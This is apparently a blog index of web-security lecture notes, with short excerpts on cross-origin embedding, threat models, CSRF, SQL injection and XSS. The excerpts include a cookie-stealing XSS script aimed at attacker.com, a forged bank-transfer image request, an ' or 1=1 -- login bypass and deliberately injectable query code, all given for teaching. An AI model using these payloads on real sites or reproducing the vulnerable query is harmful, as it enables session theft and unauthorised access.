Random Link ¯\_(ツ)_/¯ | ||
Nov 21, 2018 | » | Web Applications 101
2 min; updated Mar 14, 2021
How does a page embed content from other domains? Method 1: Loading a third party script that modifies the page. <html> <!-- Page Content --> <div id="widget"></div> <script src="https://third-party.com/widget.js"></script> </html> Method 2: Loading a third party resource in an iframe. <html> <!-- Page Content --> <iframe src="https://third-party.com/widget.js"></iframe> </html> How do you stay logged in w/o re-entering password? HTTP cookies! Alice’s browser sends a GET request to http://www.example.com/. http://www.example.com responds with a Set-Cookie instruction containing a token representing the logged in state, e.... |
Nov 21, 2018 | » | 02. Threat Models for Web Security
1 min; updated Mar 14, 2021
#1: Network Adversary Addressed by secure communication protocols (+ network security) #2: User visits adversary’s page Variants: Attacker gets the user to click a link, e.g. one that adds an item to their shopping cart. Attacker gets the user’s browser to request a link #3: Adversary is a third-party <iframe src="https://third-party.com/widget"></iframe> Note that an adversary script being embedded directly, e.g. through a <script> tag is not a threat model!... |
Nov 21, 2018 | » | 03. Cross-Site Request Forgery (XSRF)
2 min; updated Sep 5, 2022
Cross-site Request Forgery (XSRF) <img src="http://bank.com/transfer?from=from_ID&to=to_ID&value=1000"> Because the user is logged in and has a cookie, the victim site trusts the user’s browser. The attacker gets user/browser to execute command on victim site, e.g. request a link, post a form. The command has permanent effects. A frame can navigate its immediate children. Why is it designed such that it can’t navigate its children too? Consider a website with a login frame, where the user inputs passwords.... |
Nov 25, 2018 | » | SQL Injection
1 min; updated Mar 14, 2021
In a SQL injection attack, the attacker provides malicious form input that is fed into a DB server. Outcomes may include data deletion, bypassing access control, etc. Sample Buggy Login Server side code: results = db.execute( "SELECT * FROM Users WHERE user='" + form["user"] + "' " + "AND pwd='" + form["pwd"] + "'") if results: login(results) else: login_failed(form) An attacker can supply ' or 1=1 -- as the value for user.... |
Nov 21, 2018 | » | Cross-Site Scripting (XSS)
2 min; updated Mar 14, 2021
XSS 101 Suppose a site, given a non-existent path, e.g. htpp://victim.com/path, writes this error message: Error 404! `path` not found. An attacker can then lead a user to opening http://victim.com/attacker_supplied_string, where attacker_supplied_string is: <script> let addr = "http://attacker.com/?" + escape(document.cookie); document.write(`<img src="${addr}" />`); </script> Suppose a site uses Force HTTPS. If a <script src="http://..."> is not redirected to a HTTPS url, then an active attacker would still replace the JS code in the HTTP response with the malicious code that would run on the HTTPS page!... |